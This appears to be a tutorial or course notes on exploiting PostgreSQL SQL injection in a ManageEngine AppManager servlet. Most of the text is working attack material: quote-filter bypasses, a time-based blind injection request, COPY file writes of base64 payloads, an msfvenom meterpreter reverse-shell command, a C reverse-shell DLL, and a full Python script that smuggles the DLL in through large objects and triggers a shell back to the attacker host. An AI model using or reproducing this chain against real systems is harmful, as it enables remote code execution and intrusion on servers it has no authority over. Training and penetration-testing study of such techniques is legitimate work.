Query quirks

Assume we’ve discovered a SQL injection vulnerability in a PostgreSQL database and we want to include string data in our query, but the traditional ' and " characters are being filtered. The following PostgreSQL language features let us provide arbitrary characters or bypass those quotation restrictions.

CHR and string concatenation

The CHR() function and the || concatenation operator let us provide arbitrary characters and join them into a string. For example:

CREATE TABLE AWAE (offsec text); INSERT INTO AWAE(offsec) VALUES (CHR(65)||CHR(87)||CHR(65)||CHR(69));
SELECT * from AWAE;
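
If we need longer strings without quotes, a small Python helper can generate the CHR() chain for us. A quick sketch (the helper name is our own):

def to_chr_chain(s: str) -> str:
    # Build a quote-free PostgreSQL string expression, e.g.
    # "AWAE" -> "CHR(65)||CHR(87)||CHR(65)||CHR(69)"
    return "||".join(f"CHR({ord(c)})" for c in s)

print(f"INSERT INTO AWAE(offsec) VALUES ({to_chr_chain('AWAE')});")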

Dollar signs and tags

Referencing section 4.1.2.4 (dollar-quoted string constants) of the PostgreSQL documentation, we can use $$ to delimit string constants, optionally with a tag between the dollar signs (e.g. $awae$ ... $awae$). For example, with the right permissions, we can use this to write commands to disk:

CREATE TEMP TABLE AWAE(offsec text);INSERT INTO AWAE(offsec) VALUES ($$test$$);
COPY AWAE(offsec) TO $$C:\Program Files (x86)\PostgreSQL\9.2\data\test.txt$$;

Blind injection and reflections

Assume we think we’ve found a SQL injection vulnerability in the source code of a target application but, because of the nature of the endpoint we’re injecting into, the output of our SQL queries isn’t returned to us. In that case, we can use built-in PostgreSQL functions like pg_sleep(seconds) to determine whether we have arbitrary query execution. Here’s an example:

GET /servlet/AMUserResourcesSyncServlet?ForMasRange=1&userId=1;SELECT+case+when+(SELECT+current_setting($$is_superuser$$))=$$on$$+then+pg_sleep(10)+end;--+

In the above example query, we’re not only checking whether we have query execution; we’re also checking whether the user we’re executing queries as has superuser privileges.
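
Because nothing is reflected back to us, the only signal we have is time. Here’s a minimal sketch of measuring that signal in Python; the host and port are hypothetical, and the injected query mirrors the request above:

import time

import requests

# Hypothetical target; the servlet path and parameters match the GET request above.
url = "https://target:8443/servlet/AMUserResourcesSyncServlet"
payload = (
    "ForMasRange=1&userId=1;SELECT+case+when+(SELECT+current_setting"
    "($$is_superuser$$))=$$on$$+then+pg_sleep(10)+end;--+"
)

start = time.time()
requests.get(f"{url}?{payload}", verify=False)
elapsed = time.time() - start

# A roughly ten-second response means the condition was true: we have query
# execution and we're running as a superuser.
print(f"elapsed: {elapsed:.1f}s -> superuser: {elapsed > 9}")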

File system interactions

Attackers want to immediately interact with a target’s file system - that’s where all the important stuff is! With the right permissions, reading and writing to disk in PostgreSQL is pretty straightforward. Here’s a query to read content from disk into a table:

COPY <table_name> from <file_name>

And here’s a query to write content to disk from a table:

COPY <table_name> to <file_name>

And here’s a query to write a string constant to disk:

COPY (select $$awae$$) to <file_name>
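
In our tooling, we can fill those templates in with dollar-quoted paths so no quote characters are needed. A quick sketch; the table and file names below are made up for illustration:

# Hypothetical table and path, just to show the COPY templates filled in.
table, path = "AWAE", r"C:\Windows\Temp\awae.txt"

read_query = f"COPY {table} FROM $${path}$$"             # disk -> table
write_query = f"COPY {table} TO $${path}$$"              # table -> disk
string_query = f"COPY (select $$awae$$) TO $${path}$$"   # string constant -> disk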

Let’s get even crazier. Instead of just writing tiny strings to disk, we’ll write whole payloads. We accomplish this by base64-encoding our payloads and having PostgreSQL decode them before writing to disk. Here’s an example:

copy (select convert_from(decode($$ENCODED_PAYLOAD$$,$$base64$$),$$utf-8$$)) to $$C:\\Program+Files+(x86)\\ManageEngine\\AppManager12\\working\\conf\\application\\scripts\\wmiget.vbs$$;

In this example, we’ve already base64-encoded our payload. We send the query to the target; at runtime, PostgreSQL decodes the payload from base64, converts the resulting bytes to a string using UTF-8 encoding, and finally writes the VBS script to disk.

We can quickly generate a reverse shell VBS script with msfvenom like so:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.119.120 LPORT=4444 -e x86/shikata_ga_nai -f vbs

One minor inconvenience with msfvenom is that it doesn’t create one-liner VBS scripts. To get around this, we can convert the VBS script to a one-liner with the following Python:

def convert_to_oneliner(vbscript: str) -> bytes:
    # Collapse the VBS script to a single line: strip carriage returns,
    # join statements with ":" separators, and remove the "& _"
    # line-continuation sequences so string concatenations stay intact.
    with open(vbscript, "rt") as f:
        return (
            f.read()
            .replace("\r", "")
            .replace("\n", ":")
            .replace("\t", " ")
            .replace("& _ :", "& ")
            .replace("& _:", "& ")
            .encode("utf-8")
        )
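
With the one-liner in hand, producing the ENCODED_PAYLOAD used in the earlier copy query is a one-step job. A quick sketch, assuming we saved the msfvenom output to shell.vbs (a filename of our choosing):

import base64

# Convert the VBS payload to a one-liner using the function defined above,
# then Base64-encode it; the result is what replaces ENCODED_PAYLOAD in the
# copy ... decode($$...$$,$$base64$$) query shown earlier.
oneliner = convert_to_oneliner("shell.vbs")
print(base64.b64encode(oneliner).decode())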

User-defined extensions

Instead of writing scripts to disk and somehow getting the target application to execute them, we can define custom extensions and functions in PostgreSQL. A PostgreSQL extension is a compiled shared object (e.g. a .dll or .so file) that the server loads at runtime. The shared object must be built against PostgreSQL’s extension interface (the server headers, including the PG_MODULE_MAGIC block), or else it won’t be recognized by the server and will fail to load. Here’s an example of a reverse shell extension written in C, targeted at the Windows operating system:

#include "postgres.h"
#include <string.h>
#include "fmgr.h"
#include "utils/geo_decls.h"
#include <stdio.h>
#include <winsock2.h>
#include "utils/builtins.h"
#pragma comment(lib, "ws2_32")
 
#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif
 
/* Add a prototype marked PGDLLEXPORT */
PGDLLEXPORT Datum rev_shell(PG_FUNCTION_ARGS);
PG_FUNCTION_INFO_V1(rev_shell);
 
WSADATA wsaData;
SOCKET s1;
struct sockaddr_in hax;
char ip_addr[16];
STARTUPINFO sui;
PROCESS_INFORMATION pi;
 
Datum
rev_shell(PG_FUNCTION_ARGS)
{
 
	/* convert C string to text pointer */
#define GET_TEXT(cstrp) \
   DatumGetTextP(DirectFunctionCall1(textin, CStringGetDatum(cstrp)))
 
	/* convert text pointer to C string */
#define GET_STR(textp) \
  DatumGetCString(DirectFunctionCall1(textout, PointerGetDatum(textp)))
 
	WSAStartup(MAKEWORD(2, 2), &wsaData);
	s1 = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
 
	hax.sin_family = AF_INET;
	hax.sin_port = htons(PG_GETARG_INT32(1));
	hax.sin_addr.s_addr = inet_addr(GET_STR(PG_GETARG_TEXT_P(0)));
 
	WSAConnect(s1, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);
 
	memset(&sui, 0, sizeof(sui));
	sui.cb = sizeof(sui);
	sui.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
	sui.hStdInput = sui.hStdOutput = sui.hStdError = (HANDLE)s1;
 
	CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sui, &pi);
	PG_RETURN_VOID();
}

Below are some example queries we can execute on the target PostgreSQL server to have it load the reverse shell DLL from our SMB share as a user-defined function and then execute it:

self.queries = [
    ";DROP+FUNCTION+rev_shell(text,integer);--+",
    f";CREATE+OR+REPLACE+FUNCTION+rev_shell(text,integer)+RETURNS+void+AS+$$\\\\{lhost}\\{samba}\\rev_shell.dll$$,$$rev_shell$$+LANGUAGE+C+STRICT;--+",
    f";SELECT+rev_shell($${lhost}$$,{lport});--+",
]
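
As before, the queries are delivered through the injectable servlet parameter, which is why they’re already URL-encoded with + for spaces. A rough sketch of sending them, where the host, share name, and listener details are our own values:

import requests

# Hypothetical values: our attacking host, listener port, and Samba share name.
lhost, lport, samba = "192.168.119.120", 4444, "awae"
url = "https://target:8443/servlet/AMUserResourcesSyncServlet"

queries = [
    ";DROP+FUNCTION+rev_shell(text,integer);--+",
    f";CREATE+OR+REPLACE+FUNCTION+rev_shell(text,integer)+RETURNS+void+AS+$$\\\\{lhost}\\{samba}\\rev_shell.dll$$,$$rev_shell$$+LANGUAGE+C+STRICT;--+",
    f";SELECT+rev_shell($${lhost}$$,{lport});--+",
]

# Each query rides on the end of the injectable userId parameter.
for query in queries:
    requests.get(f"{url}?ForMasRange=1&userId=1{query}", verify=False)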

Large objects

We often don’t have the ability to get the victim to download our payload from our attacker host over SMB. How can we transfer the payload using only our existing ability to execute arbitrary queries? With PostgreSQL large objects, we can read and write files on the file system, as well as overwrite the contents of existing large objects within the database with our payload.

In the following Python script, we conduct the following actions:

  • We read C:\Windows\win.ini from disk, creating a large object in the database
  • We clobber the large object’s contents with our payload
  • We write our payload to C:\Windows\Temp\rev_shell.dll
  • We create a new user-defined function from our payload
  • We execute the user-defined function, triggering the reverse shell, calling back to our attacker host

import http.client
from argparse import ArgumentParser
from random import randint
 
import requests
 
http.client.HTTPConnection.debuglevel = 1
requests.packages.urllib3.disable_warnings()
HEADERS = {"Content-Type": "application/x-www-form-urlencoded"}
API_ENDPOINT = "/servlet/AMUserResourcesSyncServlet"
PARAMS = "ForMasRange=1&userId=1"
 
 
class Solution:
    def __init__(
        self, url: str, lhost: str, lport: int, filename: str, id: int
    ) -> None:
        self.s = requests.Session()
        self.url = f"{url.rstrip('/')}{API_ENDPOINT}"
        self.lhost, self.lport, self.filename, self.loid = lhost, lport, filename, id
 
    def execute_query(self, query) -> None:
        req = requests.Request(
            "POST", self.url, data=PARAMS + ";" + query + ";--+", headers=HEADERS
        )
        prepped = self.s.prepare_request(req)
        self.s.send(prepped, verify=False)
 
    def solve(self) -> None:
        # Delete existing user-defined function (UDF)
        # Unlink existing large object w/ ID
        # Import large object to clobber
        queries = [
            "DROP FUNCTION rev_shell(text,integer)",
            f"SELECT lo_unlink({self.loid})",
            f"SELECT lo_import($$C:\\Windows\\win.ini$$,{self.loid})",
        ]
 
        for query in queries:
            self.execute_query(query)
 
        # Read payload from disk
        payload = None
        with open(self.filename, "rb") as f:
            payload = f.read()
 
        # Upload payload as large object from disk
        j, chunk_size = 0, 2048
        for i in range(0, len(payload), chunk_size):
            chunk = payload[i : i + chunk_size].hex()
 
            query = ""
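            # Page 0 already exists from the lo_import of win.ini, so we
            # overwrite it in place; every later page is a brand-new row.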
            if j:
                query = f"INSERT INTO PG_LARGEOBJECT (loid,pageno,data) VALUES ({self.loid},{j},decode($${chunk}$$,$$hex$$))"
            else:
                query = f"UPDATE PG_LARGEOBJECT SET data=decode($${chunk}$$,$$hex$$) WHERE loid={self.loid} AND pageno={j}"
 
            self.execute_query(query)
            j += 1
 
        # Write payload to disk
        # Load payload as user-defined function
        # Trigger reverse shell
        queries = [
            f"SELECT lo_export({self.loid},$$C:\\Windows\\Temp\\rev_shell.dll$$)",
            f"CREATE OR REPLACE FUNCTION rev_shell(text,integer) RETURNS void AS $$C:\\Windows\\Temp\\rev_shell.dll$$,$$rev_shell$$ LANGUAGE C STRICT",
            f"SELECT rev_shell($${self.lhost}$$,{self.lport})",
        ]
 
        for query in queries:
            self.execute_query(query)
 
 
def main():
    parser = ArgumentParser()
    parser.add_argument("-u", "--url", dest="url")
    parser.add_argument("-lh", "--lhost", dest="lhost")
    parser.add_argument("-lp", "--lport", dest="lport", type=int)
    parser.add_argument("-f", "--filename", dest="filename")
    parser.add_argument("-i", "--id", dest="id", type=int, default=randint(1000, 9999))
    args = parser.parse_args()
    s = Solution(args.url, args.lhost, args.lport, args.filename, args.id)
    s.solve()
 
 
if __name__ == "__main__":
    main()

A keen eye will notice that, unlike the earlier example where we Base64-encoded a VBS payload to preserve its integrity in transit over HTTPS, here we hex-encode and decode the data we upload into our large object. Given the quirks of HTTP, URL safety, and encoding in general, we should probably just default to hex encoding when working with PostgreSQL.

Hex encoding doesn’t contain any awkward characters we have to account for: the values range from 0-9 and a-f, with none of the +, /, and = characters that Base64 uses. Fortunately for us, PostgreSQL can decode our contents from hex, converting them back to bytes before writing them to our large object.

Also notice that we upload our large object in 2048-byte chunks. Large objects are stored and read page by page, and on a default build the page size (LOBLKSIZE) is 2048 bytes, although this depends on how the server was compiled. Every page except the last must be exactly 2048 bytes; if our chunks don’t line up with the page size, the payload will be corrupted when it’s written back to disk.
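
To make the page arithmetic concrete, here’s a minimal sketch of the chunking the script performs, assuming the default 2048-byte page size:

# Hypothetical payload filename; any DLL will do for the arithmetic.
with open("rev_shell.dll", "rb") as f:
    payload = f.read()

chunks = [payload[i:i + 2048] for i in range(0, len(payload), 2048)]

# Every chunk except possibly the last is exactly one 2048-byte page; each
# becomes one row in pg_largeobject (pageno 0, 1, 2, ...).
assert all(len(c) == 2048 for c in chunks[:-1])
print(f"{len(payload)} bytes -> {len(chunks)} pages")

# Hex output only uses 0-9 and a-f, so the encoded chunk is URL-safe as-is.
print(chunks[0].hex()[:32] + "...")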